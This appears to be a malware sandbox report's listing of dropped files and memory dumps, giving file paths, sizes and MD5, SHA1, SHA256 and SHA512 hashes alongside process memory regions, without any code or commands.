72232b9f49f80c2aed118fef9d2b9d14f9af55485961a730556a16ee015d0864e370f1971b5cdc12edc626805eff11414a4c9da5cb338960f6a659248d65744f

Download Submit
C:\Windows\System32\MRT\119B625F-DB8A-6015-DF85-388BBC6B8D87\MPENGINE.DLL
Filesize
17.4MB

MD5
5945f405a1422120994c680b8ae94751

SHA1
58bd46e452acf326975748d9adc4971182b0d81d

SHA256
6eebdb4de85c15b36dc709ff7fe9177e55814d8eedba65bc720e2b4231cabd5f

SHA512
7e691a2783173eb5baa1d795335646d7b89a79d9cfc505d9aaa7dd9916c2b512d229d00b9e6ae90b41db17978f1287d13973a75a57917c35b3992fb899cb6ebd

Download Submit
C:\Windows\System32\MRT\119B625F-DB8A-6015-DF85-388BBC6B8D87\MPENGINE.DLL
Filesize
17.4MB

MD5
5945f405a1422120994c680b8ae94751

SHA1
58bd46e452acf326975748d9adc4971182b0d81d

SHA256
6eebdb4de85c15b36dc709ff7fe9177e55814d8eedba65bc720e2b4231cabd5f

SHA512
7e691a2783173eb5baa1d795335646d7b89a79d9cfc505d9aaa7dd9916c2b512d229d00b9e6ae90b41db17978f1287d13973a75a57917c35b3992fb899cb6ebd

Download Submit
C:\Windows\System32\MRT\119B625F-DB8A-6015-DF85-388BBC6B8D87\MPGEAR.DLL
Filesize
607KB

MD5
a0c4ac6378ce0313955dccfd2d9208a6

SHA1
7ee2f0f3bf4504f4f7bbc63cb5fa883711c13801

SHA256
abbe3285c58c830314f9f0ad2ddc769139c0d808e27893290adc69a535b996b1

SHA512
72ea9f0d7399fa5d6865f3f887ffa07098b883b1428b33dcb552a40bb22ca6a461a546736667ca1aa97e5f06dffd10dab765c7f6e3e827dd0335b562b27d2fb5

Download Submit
C:\Windows\Windows Display\logs.dat
Filesize
230B

MD5
4d75bac53915e0a603c80ee828303eed

SHA1
46f47392a852c23d1d8392583fb0007d9bc53a89

SHA256
56184219bd627b1b5fe02299d848aa14656dda2d9ab4757f49a03f66f4f0a56c

SHA512
358160e99f4449864ea897be69606cec21bd04737f10528d3ccba4d8b5a35d1479f90377366f6afa17d0dd6406708dbf8b4047584836b0864927689d459fe6d8

Download Submit
C:\Windows\system32\MRT.exe
Filesize
173.1MB

MD5
99e5f3ece0aab8c9fd3f0524cb1fd0db

SHA1
2e6322a608b27ad3788b75642cc209ec8b38e61b

SHA256
5293f1b8dc867cfe79ebad52e0e4b766f7c16193a2c9ccb541f468d88c6620d6

SHA512
72232b9f49f80c2aed118fef9d2b9d14f9af55485961a730556a16ee015d0864e370f1971b5cdc12edc626805eff11414a4c9da5cb338960f6a659248d65744f

Download Submit
C:\a60\bj34.zip
Filesize
236KB

MD5
72f0cb3111e1b873bbb59db13b582b0d

SHA1
5695c8036fcf674140af422af4fb4f3459a686cf

SHA256
9df05448d9c63e7470298a3db97d5fa2de7546de3496c5f8694cebb9b5280080

SHA512
76cca02e044c7a9b6e3f385918e9c9cdb3b92637f83f8440a22258e043b89d2775a35adc119e1ed42240f59f6fdec256a33fdde44091a0976891ef2b703c8df0

Download Submit
C:\a60\bj3a3.zip
Filesize
475KB

MD5
a4db1e03453fba757ba0677dc4ef5e13

SHA1
09e23c0a52157952e6ef6dc267a22df95f5811f2

SHA256
52bb35795bc48dd4598a95562f9c37b6e7acd1adaacfbde688f3798ab7269206

SHA512
d01e10c093742d3a04bbd8bb30813d848d2230f46118135e7d4f9477879640d839233cb9e71cc6056f8b6d8e69b2d04064f21c044e267ca22cb6d943589280b9

Download Submit
C:\a60\bj3ai.exe
Filesize
925KB

MD5
0adb9b817f1df7807576c2d7068dd931

SHA1
4a1b94a9a5113106f40cd8ea724703734d15f118

SHA256
98e4f904f7de1644e519d09371b8afcbbf40ff3bd56d76ce4df48479a4ab884b

SHA512
883aa88f2dba4214bb534fbdaf69712127357a3d0f5666667525db3c1fa351598f067068dfc9e7c7a45fed4248d7dca729ba4f75764341e47048429f9ca8846a

Download Submit
C:\a60\bj3m1.zip
Filesize
4.2MB

MD5
95d33059085cd2681bbb402708a6fb54

SHA1
b2fa74c98643243af35fde71f899301045daf422

SHA256
7c8007334e8d4e36940bd3c8933f30806f00e0240f5eb24538513738ca94148c

SHA512
051ffb35fb54f0a3044f3fd8f348095b1924b012e6f822f4f913c497265c443230ef1c9349a36de6e1ac69bfa70b117a7667802c74fccd90db1bd45f76ca8e5e

Download Submit
\??\c:\users\admin\pictures\8qxdqdcwr3p8gmnc6pweyyrf.exe
Filesize
5.2MB

MD5
9873907d252dcecd6baea9a11ac4b0da

SHA1
102562c75d3dbb2c9b2922674f83c5f0f36e3d0c

SHA256
a5c68511132b9590f0d60bc6fa5f43999c25d636d0b29aae1ff3787688907fe7

SHA512
2054607e09f31d65060a8b8205755f785b5ea0be9b248977b00fa95ed2938313309876d91b7fef5d33866024cf52cf0dd7a73336e703e035770e24b506db19c8

Download Submit
\??\c:\users\admin\pictures\gpyqpgah7m6iveftnpcztgp1.exe
Filesize
3.1MB

MD5
1da879daead1a2cc2fab58e6e9dbac76

SHA1
3639d65abc4640e3328971b8f087fdf1fcb713e5

SHA256
867c3ac9d0d739e717cda3f9adc98c02d189192ad18a03fc981c9e9a817e9929

SHA512
be081ac2d33d13c9ff712557cf24aa25e7f78cf771e979dd0d8b2938f50d917f1a39c7412bb21a37616357c7415b1bcc2e91e4144132c18975b6e1af96458786

Download Submit
\??\pipe\crashpad_4936_WSPKNYWTAKCFRWUX
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/216-1031-0x00000000005A0000-0x00000000009E2000-memory.dmp

Filesize
4.3MB

Download
memory/560-1052-0x00007FF7086D0000-0x00007FF70910B000-memory.dmp

Filesize
10.2MB

Download
memory/560-1062-0x00007FFDA2150000-0x00007FFDA2152000-memory.dmp

Filesize
8KB

Download
memory/924-10-0x0000016E9DBF0000-0x0000016E9DBF1000-memory.dmp

Filesize
4KB

Download
memory/924-8-0x0000016E9DBF0000-0x0000016E9DBF1000-memory.dmp

Filesize
4KB

Download
memory/924-21-0x0000016E9DBF0000-0x0000016E9DBF1000-memory.dmp

Filesize
4KB

Download
memory/924-20-0x0000016E9DBF0000-0x0000016E9DBF1000-memory.dmp

Filesize
4KB

Download
memory/924-15-0x0000016E9DBF0000-0x0000016E9DBF1000-memory.dmp

Filesize
4KB

Download
memory/924-14-0x0000016E9DBF0000-0x0000016E9DBF1000-memory.dmp

Filesize
4KB

Download
memory/924-24-0x0000016E9DBF0000-0x0000016E9DBF1000-memory.dmp

Filesize
4KB

Download
memory/924-17-0x0000016E9DBF0000-0x0000016E9DBF1000-memory.dmp

Filesize
4KB

Download
memory/924-22-0x0000016E9DBF0000-0x0000016E9DBF1000-memory.dmp

Filesize
4KB

Download
memory/924-9-0x0000016E9DBF0000-0x0000016E9DBF1000-memory.dmp

Filesize
4KB

Download
memory/1464-590-0x00007FFD7A9C0000-0x00007FFD7B481000-memory.dmp

Filesize
10.8MB

Download
memory/1464-589-0x0000000000AF0000-0x0000000000AF8000-memory.dmp

Filesize
32KB

Download
memory/1464-619-0x00007FFD7A9C0000-0x00007FFD7B481000-memory.dmp

Filesize
10.8MB

Download
memory/1464-622-0x0000000002C00000-0x0000000002C10000-memory.dmp

Filesize
64KB

Download
memory/1464-591-0x0000000002C00000-0x0000000002C10000-memory.dmp

Filesize
64KB

Download
memory/1536-1020-0x0000000002400000-0x000000000243E000-memory.dmp

Filesize
248KB

Download
memory/1536-1013-0x0000000000A5E000-0x0000000000A82000-memory.dmp

Filesize
144KB

Download
memory/1704-1030-0x00000000022D0000-0x00000000022D9000-memory.dmp

Filesize
36KB

Download
memory/1704-1016-0x0000000000A0F000-0x0000000000A22000-memory.dmp

Filesize
76KB

Download
memory/2028-1115-0x0000000000A30000-0x0000000000A7E000-memory.dmp

Filesize
312KB

Download
memory/2596-659-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/2596-744-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/2876-620-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2876-621-0x0000000074DE0000-0x0000000075590000-memory.dmp

Filesize
7.7MB

Download
memory/2876-863-0x0000000005110000-0x0000000005120000-memory.dmp

Filesize
64KB

Download
memory/2876-784-0x0000000074DE0000-0x0000000075590000-memory.dmp

Filesize
7.7MB

Download
memory/2900-62-0x000001F119A60000-0x000001F119A61000-memory.dmp

Filesize
4KB

Download
memory/2900-53-0x000001F1188E0000-0x000001F1188E4000-memory.dmp

Filesize
16KB

Download
memory/2900-59-0x000001F1189C0000-0x000001F118A52000-memory.dmp

Filesize
584KB

Download
memory/2900-66-0x000001F119000000-0x000001F119001000-memory.dmp

Filesize
4KB

Download
memory/2900-34-0x000001F1246D0000-0x000001F124ABA000-memory.dmp

Filesize
3.9MB

Download
memory/2900-61-0x000001F113CA0000-0x000001F113CA1000-memory.dmp

Filesize
4KB

Download
memory/2900-35-0x000001F124AC0000-0x000001F124E12000-memory.dmp

Filesize
3.3MB

Download
memory/2900-67-0x000001F1223E0000-0x000001F1223E1000-memory.dmp

Filesize
4KB

Download
memory/2900-69-0x000001F122400000-0x000001F122401000-memory.dmp

Filesize
4KB

Download
memory/2900-70-0x000001F122410000-0x000001F122411000-memory.dmp

Filesize
4KB

Download
memory/2900-36-0x000001F113C80000-0x000001F113C84000-memory.dmp

Filesize
16KB

Download
memory/2900-37-0x000001F119010000-0x000001F119014000-memory.dmp

Filesize
16KB

Download
memory/2900-68-0x000001F1223F0000-0x000001F1223F1000-memory.dmp

Filesize
4KB

Download
memory/2900-718-0x000001F124E20000-0x000001F125020000-memory.dmp

Filesize
2.0MB

Download
memory/2900-72-0x000001F122430000-0x000001F122431000-memory.dmp

Filesize
4KB

Download
memory/2900-77-0x000001F122480000-0x000001F122481000-memory.dmp

Filesize
4KB

Download
memory/2900-38-0x000001F11A940000-0x000001F11A944000-memory.dmp

Filesize
16KB

Download
memory/2900-40-0x000001F11D530000-0x000001F11D534000-memory.dmp

Filesize
16KB

Download
memory/2900-42-0x000001F1225A0000-0x000001F1225A4000-memory.dmp

Filesize
16KB

Download
memory/2900-43-0x000001F118840000-0x000001F118844000-memory.dmp

Filesize
16KB

Download
memory/2900-44-0x000001F118850000-0x000001F118854000-memory.dmp

Filesize
16KB

Download
memory/2900-87-0x000001F122710000-0x000001F122711000-memory.dmp

Filesize
4KB

Download
memory/2900-45-0x000001F118860000-0x000001F118864000-memory.dmp

Filesize
16KB

Download
memory/2900-41-0x000001F122590000-0x000001F122594000-memory.dmp

Filesize
16KB

Download
memory/2900-47-0x000001F118880000-0x000001F118884000-memory.dmp

Filesize
16KB

Download
memory/2900-49-0x000001F1188A0000-0x000001F1188A4000-memory.dmp

Filesize
16KB

Download
memory/2900-86-0x000001F122700000-0x000001F122701000-memory.dmp

Filesize
4KB

Download
memory/2900-54-0x000001F1188F0000-0x000001F1188F4000-memory.dmp

Filesize
16KB

Download
memory/2900-85-0x000001F1226F0000-0x000001F1226F1000-memory.dmp

Filesize
4KB

Download
memory/2900-71-0x000001F122420000-0x000001F122421000-memory.dmp

Filesize
4KB

Download
memory/2900-84-0x000001F1224F0000-0x000001F1224F1000-memory.dmp

Filesize
4KB

Download
memory/2900-83-0x000001F1224E0000-0x000001F1224E1000-memory.dmp

Filesize
4KB

Download
memory/2900-685-0x000001F11B7F0000-0x000001F11B8FD000-memory.dmp

Filesize
1.1MB

Download
memory/2900-666-0x000001F124530000-0x000001F124630000-memory.dmp

Filesize
1024KB

Download
memory/2900-52-0x000001F1188D0000-0x000001F1188D4000-memory.dmp

Filesize
16KB

Download
memory/2900-60-0x000001F113C90000-0x000001F113C91000-memory.dmp

Filesize
4KB

Download
memory/2900-51-0x000001F1188C0000-0x000001F1188C4000-memory.dmp

Filesize
16KB

Download
memory/2900-56-0x000001F118910000-0x000001F118914000-memory.dmp

Filesize
16KB

Download
memory/2900-55-0x000001F118900000-0x000001F118904000-memory.dmp

Filesize
16KB

Download
memory/2900-50-0x000001F1188B0000-0x000001F1188B4000-memory.dmp

Filesize
16KB

Download
memory/2900-48-0x000001F118890000-0x000001F118894000-memory.dmp

Filesize
16KB

Download
memory/2900-46-0x000001F118870000-0x000001F118874000-memory.dmp

Filesize
16KB

Download
memory/2900-39-0x000001F11D520000-0x000001F11D524000-memory.dmp

Filesize
16KB

Download
memory/2900-82-0x000001F1224D0000-0x000001F1224D1000-memory.dmp

Filesize
4KB

Download
memory/2900-57-0x000001F118920000-0x000001F11896B000-memory.dmp

Filesize
300KB

Download
memory/2900-63-0x000001F118ED0000-0x000001F118ED1000-memory.dmp

Filesize
4KB

Download
memory/2900-65-0x000001F118FF0000-0x000001F118FF1000-memory.dmp

Filesize
4KB

Download
memory/2900-64-0x000001F118FE0000-0x000001F118FE1000-memory.dmp

Filesize
4KB

Download
memory/2900-81-0x000001F1224C0000-0x000001F1224C1000-memory.dmp

Filesize
4KB

Download
memory/2900-80-0x000001F1224B0000-0x000001F1224B1000-memory.dmp

Filesize
4KB

Download
memory/2900-58-0x000001F118970000-0x000001F1189B9000-memory.dmp

Filesize
292KB

Download
memory/2900-73-0x000001F122440000-0x000001F122441000-memory.dmp

Filesize
4KB

Download
memory/2900-74-0x000001F122450000-0x000001F122451000-memory.dmp

Filesize
4KB

Download
memory/2900-75-0x000001F122460000-0x000001F122461000-memory.dmp

Filesize
4KB

Download
memory/2900-76-0x000001F122470000-0x000001F122471000-memory.dmp

Filesize
4KB

Download
memory/2900-78-0x000001F122490000-0x000001F122491000-memory.dmp

Filesize
4KB

Download
memory/2900-79-0x000001F1224A0000-0x000001F1224A1000-memory.dmp

Filesize
4KB

Download
memory/4380-812-0x00007FFD7A9C0000-0x00007FFD7B481000-memory.dmp

Filesize
10.8MB

Download
memory/4380-962-0x000001C82D2E0000-0x000001C82D302000-memory.dmp

Filesize
136KB

Download
memory/4380-816-0x000001C82D2A0000-0x000001C82D2B0000-memory.dmp

Filesize
64KB

Download
memory/4380-825-0x000001C82D2A0000-0x000001C82D2B0000-memory.dmp

Filesize
64KB

Download
memory/4568-1121-0x0000000000400000-0x0000000000633000-memory.dmp

Filesize
2.2MB

Download
memory/4724-1136-0x00000000001C0000-0x00000000006E9000-memory.dmp

Filesize
5.2MB

Download
memory/4868-1133-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5256-1034-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5256-935-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5256-1021-0x00000000009A0000-0x0000000000CEA000-memory.dmp

Filesize
3.3MB

Download
memory/5256-1043-0x0000000000900000-0x0000000000915000-memory.dmp

Filesize
84KB

Download
memory/5260-1109-0x0000000000D10000-0x000000000110E000-memory.dmp

Filesize
4.0MB

Download
memory/5416-843-0x00000000004C0000-0x00000000004C2000-memory.dmp

Filesize
8KB

Download
memory/5544-1134-0x0000000000C20000-0x0000000000C4F000-memory.dmp

Filesize
188KB

Download
memory/5544-1125-0x0000000000500000-0x0000000000527000-memory.dmp

Filesize
156KB

Download
memory/5596-1064-0x0000000074DE0000-0x0000000075590000-memory.dmp

Filesize
7.7MB

Download
memory/5596-649-0x0000000005A00000-0x0000000005A10000-memory.dmp

Filesize
64KB

Download
memory/5596-981-0x0000000006AD0000-0x0000000006ADA000-memory.dmp

Filesize
40KB

Download
memory/5596-1017-0x0000000007200000-0x000000000727A000-memory.dmp

Filesize
488KB

Download
memory/5596-634-0x0000000000E50000-0x0000000000F1C000-memory.dmp

Filesize
816KB

Download
memory/5596-635-0x0000000074DE0000-0x0000000075590000-memory.dmp

Filesize
7.7MB

Download
memory/5596-645-0x0000000005850000-0x00000000058E2000-memory.dmp

Filesize
584KB

Download
memory/5596-939-0x0000000074DE0000-0x0000000075590000-memory.dmp

Filesize
7.7MB

Download
memory/5596-639-0x0000000005E00000-0x00000000063A4000-memory.dmp

Filesize
5.6MB

Download
memory/5596-650-0x0000000003290000-0x000000000329A000-memory.dmp

Filesize
40KB

Download
memory/5596-651-0x0000000005AB0000-0x0000000005B4C000-memory.dmp

Filesize
624KB

Download
memory/5596-973-0x0000000006AC0000-0x0000000006AC6000-memory.dmp

Filesize
24KB

Download
memory/5596-665-0x0000000005DE0000-0x0000000005DF0000-memory.dmp

Filesize
64KB

Download
memory/5648-934-0x00000000004B0000-0x00000000009D9000-memory.dmp

Filesize
5.2MB

Download
memory/5676-813-0x00000000002F0000-0x000000000060C000-memory.dmp

Filesize
3.1MB

Download
memory/5676-871-0x0000000074DE0000-0x0000000075590000-memory.dmp

Filesize
7.7MB

Download
memory/5676-854-0x0000000005090000-0x00000000050F6000-memory.dmp

Filesize
408KB

Download
memory/5676-845-0x00000000051C0000-0x0000000005382000-memory.dmp

Filesize
1.8MB

Download
memory/5676-1011-0x0000000005B00000-0x0000000005B10000-memory.dmp

Filesize
64KB

Download
memory/5696-1055-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/5772-880-0x00000000006A0000-0x00000000006A1000-memory.dmp

Filesize
4KB

Download
memory/5776-933-0x0000000000E80000-0x0000000000E81000-memory.dmp

Filesize
4KB

Download
memory/5796-1042-0x00000000001C0000-0x00000000006E9000-memory.dmp

Filesize
5.2MB

Download
memory/5832-997-0x0000000000400000-0x0000000000633000-memory.dmp

Filesize
2.2MB

Download
memory/5996-852-0x00000000001C0000-0x00000000006E9000-memory.dmp

Filesize
5.2MB

Download
memory/6104-901-0x00000000001C0000-0x00000000006E9000-memory.dmp

Filesize
5.2MB

Download
memory/6132-1110-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download